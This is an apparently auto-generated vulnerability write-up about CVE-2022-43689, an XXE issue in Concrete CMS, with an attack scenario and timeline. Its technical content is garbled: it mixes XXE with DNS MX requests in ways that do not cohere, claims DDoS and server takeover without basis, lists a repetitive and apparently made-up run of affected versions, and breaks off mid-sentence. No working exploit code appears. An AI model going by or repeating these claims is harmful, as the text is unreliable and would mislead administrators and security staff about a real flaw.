CVE-2022-43689 Concrete CMS is vulnerable to XXE DNS requests that disclose IPs.

Requesting the MX hostname record for a subdomain leading to the server’s public IP address, for instance

www.example.com

results in the delivery of XXE payload to the receiving server. An attacker can exploit this bug by injecting a crafted DNS request with a maliciously constructed subdomain leading to the server’s public IP address. This issue results in the XXE payload being sent to the receiving server and could be leveraged to gain access to the server or even perform a DDOS attack. All concrete5 versions between 8.5.9 and 9.0.3 are vulnerable. All concrete5 versions between 9.0.0 and 9.1.2 are also vulnerable. All concrete5 versions between 9.1.2 and 9.2.0 are vulnerable. All concrete5 versions between 9.2.0 and 9.3.0 are vulnerable. All concrete5 versions between 9.3.0 and 9.4.0 are vulnerable. All concrete5 versions between 9.4.0 and 9.5.0 are vulnerable. All concrete5 versions between 9.5.0 and 9.6.0 are not vulnerable. All concrete5 versions 9.6.0 and 9.7.0 are not vulnerable. All concrete5 versions between 9.7.0 and 9.8.0 are not vulnerable. All concrete5 versions between 9.8.0 and 9.9.0 are

Operation Scenarios

Exploitation of this flaw could result in the following scenario:

1. An attacker creates a subdomain called www.example.com, leads to the public IP address of the concrete5 server and receives the XXE payload on their own server.
2. The attacker can leverage this flaw to perform a DDOS attack against the concrete5 server, or gain access to the server running concrete5 by sending up a crafted DNS request with a maliciously constructed subdomain leading to the public IP address of the concrete5 server.

Timeline

Published on: 11/14/2022 23:15:00 UTC
Last modified on: 11/17/2022 04:57:00 UTC

References